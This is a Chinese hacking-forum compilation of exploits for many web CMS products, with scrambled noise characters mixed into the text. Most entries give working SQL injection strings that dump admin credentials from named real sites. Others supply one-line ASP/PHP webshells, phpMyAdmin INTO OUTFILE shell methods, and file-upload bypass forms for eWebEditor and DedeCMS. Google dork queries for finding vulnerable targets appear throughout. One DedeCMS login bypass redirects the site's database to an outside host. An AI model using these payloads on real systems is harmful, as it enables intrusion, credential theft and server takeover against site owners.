启航企业建站系统 cookie注入漏洞通杀所有版本
7 H6 n6 H0 _6 S
# v6 z9 y% Z! @' k; g( R直接上exploit:
' y0 ^3 h ^& cjavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
3 {+ Z& `# k) |test:http://www.tb11.net/system/xitong/shownews.asp?id=2101 ^1 G p& V1 R5 I, l
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 R" x. t/ `4 ]3 O* z. F# j
Asprain论坛 注册用户 上传图片就可拿到webshell
3 B" @3 O& X' t7 n$ a8 a
+ ^! W( M- v* D% BAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
8 ]( b' M/ Y+ D" b1 G1.txt存放你的一句话马 如:<%execute(request("cmd"))%>1 `! L' d. q) ?# O6 B/ o
2.gif 为一小图片文件,一定要小,比如qq表情图片
+ e3 Z9 o u( y3 l; I( ?3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
: ?7 @. R1 O) X! Q2 l4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了) V# \4 \2 p8 i7 Q, [7 o9 H
5.q.asp;.gif
" O* ~) C( U" ^, Ggoogle:Powered by Asprain; q: X4 a0 C1 \+ V) J
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ ?% R' U! s% k% _: o U9 j+ K2 [5 l9 L8 w5 Y0 _( u* [% @# z
ShopNum1全部系统存在上传漏洞。
2 }+ H# D' c o& [
4 r6 Y- W5 M% V- N首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。- F: w! R- _$ x$ W! e- d4 N
按说明 提示登录后台。。' r( c3 `# s7 {4 K, `
在后台功能页面->附件管理->附件列表
% k6 j a- Q9 o& V( g5 W# N9 k可以直接上传.aspx 后缀木马
$ d+ R5 ^9 D2 S# Z2 h, x6 Khttp://demo.shopnum1.com/upload/20110720083822500.aspx* y! B7 u, K! R5 z l! N# y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' [/ K- V7 E; m3 |- P
8 Z( d' @; C2 x7 x2 ]8 ]
牛牛CMS中小企业网站管理系统 上传漏洞
6 X' i' K; S4 g7 Y4 H! Y: X5 w2 V& g+ J$ O3 x5 e" J+ h
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。+ S( \' p0 q! O. [3 ?, B
后台:admin/login.asp* \8 j. }$ _; \3 t0 x
ewebeditor 5.5 Nday/ V7 n. Y+ w$ o
exp:7 v" R3 E3 E9 N$ J' F
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?3 \ Q8 a& T0 |* o# j E
<input?type=file?name=uploadfile?size=100><br><br>?
! v$ F0 t5 s. O- O<input?type=submit?value=upload>?7 j/ u9 `$ [) w U# Z5 R; I% F
</form>
k; L6 B# \4 Pps:先上传小马.; @: V- I, P, G! o
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏$ o$ ]" @3 s' |- Y! ` B
7 `/ b% Q8 {% Y5 v--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; X0 F% Z+ G1 U* z4 E0 y( L6 t$ W
( U. A% \% g& |, G# ^1 _YothCMS 遍历目录漏洞$ m) ^" _8 x1 D4 w, a @
& [- T9 ^7 |8 { e* u优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。$ {( G% @+ U# K* F% G3 \
默认后台:admin/login.asp+ N4 z1 ?( ?" g% A) Q
遍历目录:
- Z) `% [+ O% Q1 l5 |! v4 xewebeditor/manage/upload.asp?id=1&dir=../; F6 i" l! a" B4 c* l" g* O) n! k
data:4 ~$ }) `( Q) w% P# I
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa1 u/ g4 o2 j$ e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 W: x7 J; } f( \0 k V& B' J2 C' y# X, m* A4 I0 w) W! X
Net112企业建站系统 1.0
' t0 I9 J, v' o! m" X9 A9 f' f% D5 V* w: G
源码简介:# u# K( K6 E4 M, `' e
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。% S2 L5 D1 c d- w. ^
添加管理员:
6 ~$ l3 |' F% S thttp://www.0855.tv/admin/admin.asp?action=add&level=2( ~* |5 Q. L. ]0 t/ d
其实加不加都不是很重要,后台文件都没怎么作验证。
; R4 U @' I8 {4 D9 s& v上传路径:( h" p* ]$ E2 k+ _7 t/ A
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200+ M6 @" M% ^$ q" P
http://www.0855.tv/inc/Upfile.asp?Stype=2
7 G( @$ V: W5 F& e5 ]5 O" l怎么利用自己研究。
, s6 q6 @) h3 i$ o; n& ]+ X: Z遍历目录:/ Q6 W! \' o" W2 e) [+ P' ]* M
http://www.0855.tv/admin/upfile.asp?path=../..
0 @ ?# q7 i2 m; W$ }如:
; N" B* T9 t+ ]http://www.0855.tv/admin/upfile.asp?path=../admin; B# G! x, b, P! h8 z0 t
http://www.0855.tv/admin/upfile.asp?path=../data* s8 t! }+ P7 Y. k$ H- I
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% ?- x( h. T2 x3 X" [ A+ u0 C; U' J! C2 Z) v9 H0 ]4 B/ n
易和阳光购物商城通杀 上传漏洞
3 v0 Q9 y( {% U! ~: E0 o) c2 c! N9 x2 `
前提要求是IIS6.0+asp坏境。/ W# x$ {. d h5 R% C+ R8 X- B
漏洞文件Iheeo_upfile.asp
2 y% y" x$ h$ y: _% M1 k& G) o过滤不严.直接可以iis6.0上传
/ e7 C' _& ^: u6 o把ASP木马改成0855.asp;1.gif* A, e5 N4 r; A
直接放到明小子上传
+ v& s4 A& I: I; MGoogle搜索:inurl:product.asp?Iheeoid=
8 B0 o4 ~, }5 P. n6 ^* i h--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& ~7 n9 w. t* w) C. P1 {( E
$ @% Z* `9 D: D3 C, O; r- vphpmyadmin后台4种拿shell方法
4 b4 g6 M* y4 _7 P% K2 X
! [# j' W; [# `5 u4 K8 h方法一:+ l! W# k9 W/ r
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );3 X+ e% j5 F- s2 Y! H5 o: K8 t( C
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
& k! B# v+ d3 ]SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';& C$ n) a% U$ U, v0 s; W" a. v6 `
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php1 O1 ]" ?9 i# J5 K% U- W7 `' L, E
一句话连接密码:xiaoma
- Z- Y0 G% f4 n9 P0 u b9 A5 [方法二:
0 J, H9 C& A1 v! BCreate TABLE xiaoma (xiaoma1 text NOT NULL);
6 A+ R3 A5 d+ ?: M; C& nInsert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');1 t' f6 a. o9 }2 G
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';! M. Z- O, Z5 q% L
Drop TABLE IF EXISTS xiaoma; k. v0 R8 n& [5 J
方法三:9 U& E- m/ Y/ b" ^3 T) g) v6 O0 h; ~
读取文件内容: select load_file('E:/xamp/www/s.php');
' m: @7 Q3 {4 c1 F6 U; Z6 s1 T0 O写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
3 {" w7 \8 E; @0 e0 D, Acmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'7 j" S+ p* l- D" F
方法四:5 W' K a; o" ~
select load_file('E:/xamp/www/xiaoma.php');* I) q$ P& E- @: K( I+ [
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
2 r) l* D7 ]& ]. Z然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
, F: B- W0 k/ ]/ S o& \--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- U. e$ I: u5 I/ P1 T
k. n1 C- U' B0 M& \; q; l4 O传信网络独立开发网站源码0day漏洞6 s2 J* R* u0 b' P5 h' T
- ~/ d) Z* H* g* e' k" z/ ^
后台system/login.asp- ^& v) [& v. Q. e5 F# g
进了后台有个ewebeditor
- n* x4 X4 {. R8 n. u4 f0 RGoogle 搜索inurl:product1.asp?tyc=, T: Y5 E l& k9 Z. _5 q7 h: C" G; \
编辑器漏洞默认后台ubbcode/admin_login.asp
( g. C* g8 O3 E6 N数据库ubbcode/db/ewebeditor.mdb
& j: P/ R# o8 g" i1 ~+ i5 L默认账号密码yzm 111111
( P0 L& c; F% k" e% I, Q6 y1 S+ Y" ^3 x! ^& r0 ^
拿webshell方法) }# f a2 @' N. M0 o& S; @
登陆后台点击“样式管理”-选择新增样式 $ E& o* e( c9 w5 T0 {
样式名称:scriptkiddies 随便写
[0 l o; z. `# H% j( w路径模式:选择绝对路径 $ A) O. [" m+ d$ X" s: ^; q
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx0 i& l. }# ~! P
图片类型比如就是我们要上传的ASP木马格式
- d) I. d0 v7 ~( D上传路径:/; f$ x+ Y6 |3 ?6 C" n' w
图片限制:写上1000 免的上不了我们的asp木马
- u5 C$ }5 `' u( n上传内容不要写4 w0 B# P' C4 k+ {" N, W
可以提交了
, u2 `/ H4 \2 O- A; R) ~样式增加成功! * k2 t( M2 {' B! N2 J
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 ( s, L A6 W& y9 y
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置1 B6 h* F$ P# n0 f
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies4 W$ |6 y. \2 m: y/ c$ U
上ASP木马 回车 等到路径3 m4 @6 O: H- C9 D( m3 l
0 h) \ s, w2 z7 g后台:system/login.asp
( S0 Z, d8 \( t Y& E( V5 ]Exp:; ]- G# ^! h$ ]8 ]1 C
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master8 Y- y! [+ e7 F. A
测试:
* z% b5 }( \8 xhttp://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
9 F2 {) G5 m l" thttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master6 @' B6 T1 J8 a+ c
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 X) U- w2 P9 L5 m+ r+ V0 n% b+ F6 s1 u4 I7 |/ e9 ]
foosun 0day 最新注入漏洞. m+ h& ]# R9 l+ r G
3 t8 b" [& j7 } A
漏洞文件:www.xxx.com/user/SetNextOptions.asp* ~; B& d! ~ b; m5 o
利用简单的方法:
& j, p* x& Q7 {1 t* L暴管理员帐号:1 s4 m. J1 s. S/ c; z' C' q8 z C
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
" R& Y, }% T: y暴管理员密码:
- e8 m q O/ W" x6 y* shttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,6 G8 e T+ w" s! g' I( B9 M
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------. `' j' m; A! Y
! }* g7 m$ x: v7 h5 ^. [网站程序的版权未知!
! z* o" R! ?+ z1 \9 K; m6 i
9 i8 m/ ^! M' d5 l默认网站数据库:' u Q {/ `# B$ ^2 x( b
www.i0day.com/data/nxnews.mdb1 ^8 T) ?9 A' {8 o9 h, g
ewebeditor 在线编辑器:
2 G5 R6 S9 O# u6 E编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb/ ?$ V8 T2 M% s; s: j J; ?7 [. B
登录地址:ewebeditor/admin_login.asp' a: {: y! C, p$ g9 F: A" d4 u
默认密码:admin admin
$ g0 d$ E' K& Z& ~3 f$ p登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data1 V* C' t# h4 j! t& _2 ]" r
1 `3 A* }/ U8 j3 KSql注入漏洞:
5 A j! `$ E4 n& f* s3 Uhttp://www.i0day.com/detail.asp?id=123 ^+ W9 H- k# X0 N/ i
exp:9 ~- A! n8 k2 u7 r8 }
union select 1,admin,password,4,5,6,7,8 from admin
4 B. X U/ y1 O$ q% l/ x" P爆出明文帐号/密码
9 r/ X0 a0 g5 e9 p% T
3 Y& e6 I* G' l6 d上传漏洞:( S' I" c# j. v+ B# ?* O
后台+upfile.asp, O: B% S1 G$ p7 h m" }1 t
如:. O9 F. x/ t$ s- m
http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。6 r" {5 R% B( B5 V
shell的地址:网址+后台+成功上传的马
' P$ v( w$ Q0 G# g4 M8 {google:inurl:news.asp?lanmuName=
1 A0 \7 s; }7 o" M------------------------------------------------------------------------------------------------------------------------------------------------------------------------& D! u3 j0 P+ q" f4 o
' D* J, |) y" s3 \) {( t
dedecms最新0day利用不进后台直接拿WEBSHELL
( v" `' b* U z7 T- p$ _) l K% M" F: J5 ]6 m
拿webshell的方法如下:
_# t& `0 Q0 C9 ]$ j网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
" ?+ Q; s, t+ U/ T, q6 p前题条件,必须准备好自己的dede数据库,然后插入数据:
% b) ?$ ?9 }% s0 q4 F0 Kinsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
0 @, q# k! I3 r/ Y. W' w! ^' r1 l. u% ]
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。- c& c9 R4 a! \9 I7 k$ N) r
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
$ ?" D: X& E( n; m4 O$ k( O<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
. A1 \+ X C. L3 W1 V( z. i5 \0 o b<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />3 _& n: p/ `3 N @0 d
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
6 u* S6 V9 x! q! ?" _: M* n+ x<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />) A' K# S& G0 X4 J$ ^8 R3 a
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />, c% R2 P$ h; F
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />$ b8 `( Q* ] e: y7 ^
<input type="text" value="true" name="nocache" style="width:400">! \ q9 Q t1 }
<input type="submit" value="提交" name="QuickSearchBtn"><br />8 b& U' G% I0 n8 u0 t
</form>
8 {( S) x9 }. Z# `5 j<script>
2 A1 X; Q. K" d0 mfunction addaction()2 l* e" Z% F1 T' _
{
/ u* b5 `5 N6 L# _6 R( N+ o. |" kdocument.QuickSearch.action=document.QuickSearch.doaction.value;
- Q$ @: W+ Z# G$ k; ^. d}5 e p+ B) ]$ l
</script>% i4 v& ^8 @5 R
-----------------------------------------------------------------------------------------------------------------------------------------------# P4 W, y4 O8 }, L
: D/ k* j# x7 @. o. U! Gdedecms织梦暴最新严重0day漏洞. i3 `/ H3 M* W* B& i/ Y6 s; t
bug被利用步骤如下:* t4 x% E: D& P+ P3 C& r! w
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
2 W9 \5 u3 Q5 ]把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
: Q" [5 R( b0 S$ X2 T& l-------------------------------------------------------------------------------------------------------------------------------------------9 P$ C# J- z0 Q' Y) ~; h2 l5 R
% n$ q3 k8 O, { m( ?. g" E
多多淘宝客程序上传漏洞 . H* C- b5 B) h: O- i; e
漏洞页面:# f# m, W: [9 ?/ W. {' y! m$ j
admin\upload_pic.php- f, Z6 W, X. O5 X, c
传送门:
1 U- [8 M) J! [. zhttp://www.www.com/admin/upload_pic.php?uploadtext=slide1" I' y0 k5 r8 ~$ o
PS:copy张图片马 直接 xxx.php 上传抓包地址!
5 W- ?/ I8 v, a( C! i8 p------------------------------------------------------------------------------------------------------------------------------------------------------7 z1 K4 v1 w, s# E6 n# |
5 O r8 i. P* s8 [2 y+ W无忧公司系统ASP专业版后台上传漏洞
5 T; h1 r$ f4 A/ k漏洞文件 后台上传
6 e* x6 B, `( ?% W! kadmin/uploadPic.asp' O. m. i$ |1 ~; T t6 @6 z
漏洞利用 这个漏洞好像是雷池的
* u0 j, ` e8 a3 l |http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
@; T; U* I8 Y$ C等到的webshell路径:# f% D/ u* F, b, [# O
/UploadFiles/scriptkiddies.asp;_2.gif# r9 m: e: M% g6 } Y5 I! C
---------------------------------------------------------------------------------------------------------------------------------------------------
' B( u# p# Y* K' @
8 {! V- r% t, C% V V" I住哪酒店分销联盟系统2010/ S' e/ N9 k3 C9 g* m% I2 `! Z
Search:
& K7 q# G" H$ Y% f+ o! E& Ainurl:index.php?m=hotelinfo% R5 H9 d" R8 f- Z& L, P8 M
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin2 P* g8 g8 p' ~4 h
默认后台:index.php?m=admin/login
: ^! |2 i; M2 Y+ k d--------------------------------------------------------------------------------------------------------------------------------------------------
% K, k1 N9 a' l0 J* _3 J
0 d- ~' o4 b1 a Hinurl:info_Print.asp?ArticleID=
. x1 b6 u/ L: a2 x$ r3 }后台 ad_login.asp) w% M2 q: ~; g4 X
爆管理员密码:
5 x/ t: k- o) g: ]/ O: Q" `union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin2 p+ ]5 ^' a$ H. S3 h2 i: g
------------------------------------------------------------------------------------------------------------------------------------------------------------
1 ]: s; e4 M* ?' K9 A
2 ^7 s+ Z U. G3 w C8 K搜索框漏洞!
5 n! t6 Q1 x% f8 B8 ?%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='! f( W" y5 z9 \: ~
--------------------------------------------------------------------------------------------------------------------------------------------------------
/ ~. y" {) f0 I x7 f/ \6 h" E1 x5 k0 u1 S" p. g6 S
关键字:8 F! {- n! d( \5 S7 `$ w# r. M3 a% }
inurl:/reg_TemletSel.asp?step=2% f9 w& O% S+ Q! _* Y9 l
或者
6 j; I3 Q3 L2 Y$ V7 f电子商务自助建站--您理想的助手
$ q$ {% x% I9 {8 |7 Y+ z; D-------------------------------------------------------------------------------------------------------------------------------------------------
4 g) g! F c8 x3 U$ E
. R7 Z! X" _* C8 A& }iGiveTest 2.1.0注入漏洞
- Z7 Q- V; B0 D, Q nVersion: <= 2.1.0/ o1 E4 Z4 V0 z. S6 _/ o7 t
# Homepage: http://iGiveTest.com/) Q l5 \8 w- Q. w
谷歌关键字: “Powered by iGiveTest”+ u( g; B- q+ U9 g, E
随便注册一个帐号。然后暴管理员帐号和密码
* v' C# M" f4 g# @8 Phttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (15 N" H4 V l, J- Q" j- D5 s) y# b
------------------------------------------------------------------------------------------------------------------------------------------------
|4 _8 }% H5 O
* l! D) b5 o3 v1 WCKXP网上书店注入漏洞" u$ {! F$ p+ m) D' M1 S, n
工具加表:shop_admin 加字段:admin0 C; U7 K7 s: x# e, V2 ^
后台:admin/login.asp
5 P0 y0 E2 O" K# ^7 \登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
1 G$ O; O# `; q4 q' |5 l% ninurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
. M/ J9 O6 I1 r- ^$ h--------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ A# x y: l* t" F; Q- T
* g9 l( }: z' k J$ b( B
段富超个人网站系统留言本写马漏洞
5 k4 d4 Y4 L' l* A& |源码下载:http://www.mycodes.net/24/2149.htm
& _! p# Y* u1 o' s: E3 X7 Q$ e) e4 faddgbook.asp 提交一句话。
- B9 t3 ]: S m. b1 I0 S" U- v连接: http://www.xxxx.tv/date/date3f.asp
2 i2 Y- H' S. T+ zgoogle:为防批量,特略!# g$ M: _3 e% i9 c
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
y; ^( L% _' U3 i9 m( H
9 |8 D7 X7 S. {1 Z9 p% T智有道专业旅游系统v1.0 注入及列目录漏洞
3 z) V" b" W5 b, g" r默认后台路径:/admin/login.asp
( ^; E+ y+ s/ O8 _# I$ G+ [默认管理员:admin2 r& p9 U0 M2 [
默认密码:123456. @# H e' ^, R* q, ^7 b! S
SQL EXP Tset:
; D* A3 }1 r2 U/ [- Phttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin5 N* O' x9 ~" k' e- W& o# q
------------------------------------------------------------------------------------------------------------------------------------------------------------------------ B0 H" `1 k3 q* N$ D6 j
( f7 V! c# K+ Mewebeditor(PHP) Ver 3.8 本任意文件上传0day
$ b0 w) Q! U( A. U- zEXP:+ P9 M6 ~. k# h8 W( ~
<title>eWebeditoR3.8 for php任意文件上EXP</title>( O7 U8 A) q$ f: x |! W" e! \
<form action="" method=post enctype="multip
7 u$ W6 p2 R& ^% W6 M7 n. ~art/form-data"> `& L$ D7 U) c
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 3 o1 K9 i0 ?! i: L$ d
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
" m3 J5 h* e0 \7 U6 ]- d7 s0 Z<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> ( C6 P/ p: I+ e$ L; q
file:<input type=file name="uploadfile"><br>
; H* w7 R2 D( Z2 Q" y<input type=button value=submit onclick=fsubmit()> - a" x7 J" n1 o1 a8 ~; V. I
</form><br>
" G7 S% J9 J% h# b<script> : a0 U' @" u1 e6 }
function fsubmit(){ 9 | V" m3 E8 G( t/ u
form = document.forms[0];
8 T6 N7 r M c2 a; \7 @form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
; h; M( j+ s' e( Dalert(form.action); + U* s9 x. ?& G7 U! R
form.submit(); 1 |3 G4 P7 b8 k1 s! Q. y3 f
}
4 \, p$ s. v9 B. W" q$ y</script>) r) Z, ~ n# F! k0 L1 `4 |7 [
注意修改里面ewebeditor的名称还有路径。1 @. b8 [2 G. l/ H4 l
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------) q) `" H) o/ D' E8 Z
3 c& U, X( l( M0 J
提交’时提示ip被记录 防注入系统的利用 i7 c$ ?$ `! x2 Q
网址:http://www.xxx.com/newslist.asp?id=122′* F4 o3 L" y0 [8 _' d, n
提示“你的操作已被记录!”等信息。
2 s: o; Z' i* H% v' J. I利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
2 l Z- i1 R/ A4 J7 p/ [% J* Y7 K3 d-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------, | D ~; Q/ v* k+ F# [3 H* a7 e
% g$ h# A# ?3 I3 J% s4 P5 Q
西部商务网站管理系统 批量拿shell-0day' G$ y% z) C- ]3 }8 {* U. q; e
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
+ a3 f7 r8 f" m8 D+ b8 C! H) i1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛- Y5 p! V6 i( l
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
4 X' Q3 N+ `% Q0 ^- c3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂+ r9 b0 l. n& F; p F! E, @% b
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------( l3 g3 ], _. W% i. q6 |8 F
$ j. X% _3 v+ y7 E$ P! m5 dJspRun!6.0 论坛管理后台注入漏洞/ ]1 v0 Z8 D6 [$ g- b; @1 h
/ X/ w3 k1 L$ @0 O, ZSEBUG-ID:20787 发布时间:2011-04-30 影响版本:) D4 c. N2 D3 y0 B9 r8 j; _
JspRun!6.0 ( G- R% d" U3 d, \8 p; c0 Z2 j$ j
漏洞描述:
9 E9 M3 c, c3 R6 O) `JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。2 R+ M& Q2 P: T; t
在处理后台提交的文件中ForumManageAction.java第1940行
9 N6 r$ P+ S8 j+ Z! G+ PString export = request.getParameter("export");//直接获取,没有安全过滤9 ]( S# _# Q: ^( w5 ^9 U- w8 P
if(export!=null){4 x! P7 z0 `3 A
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...& f* |1 i* Y1 ~* |3 ~
if(styles==null||styles.size()==0){
* W9 m$ ?# x( O5 Q2 x0 @" R<*参考7 E; ^3 W# h2 p# V. L9 j, o
nuanfan@gmail.com$ I# |: l3 b1 I& [5 q0 d9 P
*> SEBUG安全建议:
5 O0 b/ ?- o- M# z- Ewww.jsprun.net# D( L, x6 E7 {( e$ j
(1)安全过滤变量export
1 ~; ?, c- Q; S* Q(2)在查询语句中使用占位符# I5 e# Y6 g' Y% T. D' Y. L
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------9 C& Y! b; ]+ H5 |1 O
8 I1 Z; ]. O/ Q# k( T% P乌邦图企业网站系统 cookies 注入6 N% ]- R: k' k* f. K' C/ W
/ y0 O: d2 z, C0 G4 B
程序完整登陆后台:/admin/login.asp% V2 H- n4 Y" |* r1 G1 e
默认登陆帐号:admin 密码:admin888
, q2 {9 K" T3 i" p语句:(前面加个空格)
9 s7 k# W' t0 R( e! i+ u xand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
/ _& |0 Y W/ ]( _4 P或者是16个字段:: k5 ]7 o; L* K( e, T0 r
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin3 L1 ~ ^+ x% Y) v! G5 {2 W
爆不出来自己猜字段。
O( H& c# R8 U( U注入点:http://www.untnt.com/shownews.asp?=889 u7 [8 S: i3 o2 `# G+ X7 P4 w% [
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
) q( q" i5 o; B; M; c# F关键字:
. i2 O: B5 O/ [ e; L# ninurl:shownews?asp.id=! a% Q. i9 c9 T* M. W' f
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 y/ e- W i, J* I8 Z1 t4 E
. h4 o0 [9 G, uCKXP网上书店注入漏洞
0 ? ?5 R* n: H6 U1 f& Y8 i2 V# c; W1 L) ~2 K: H
工具加表:shop_admin 加字段:admin
5 N( L) u: b1 t3 z后台:admin/login.asp
+ Q/ O# D9 j" [. c" z4 L+ S登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
7 i# h9 Q9 W; i! ~8 D- Iinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
- x* v1 p! T0 t8 j' R---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& F) _* g3 X1 s: n
9 P- b" E2 I( Z. s. @5 [: \! vYxShop易想购物商城4.7.1版本任意文件上传漏洞
% K2 C0 y4 n8 i# J6 {( D
' w+ e" V y; q8 f7 e; Uhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
& T$ O {+ \' Q. p跳转到网站根目录上传任意文件。 z# L0 [3 N* t, \$ [$ m
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件7 M$ W$ q8 z" u" m5 |: h1 {
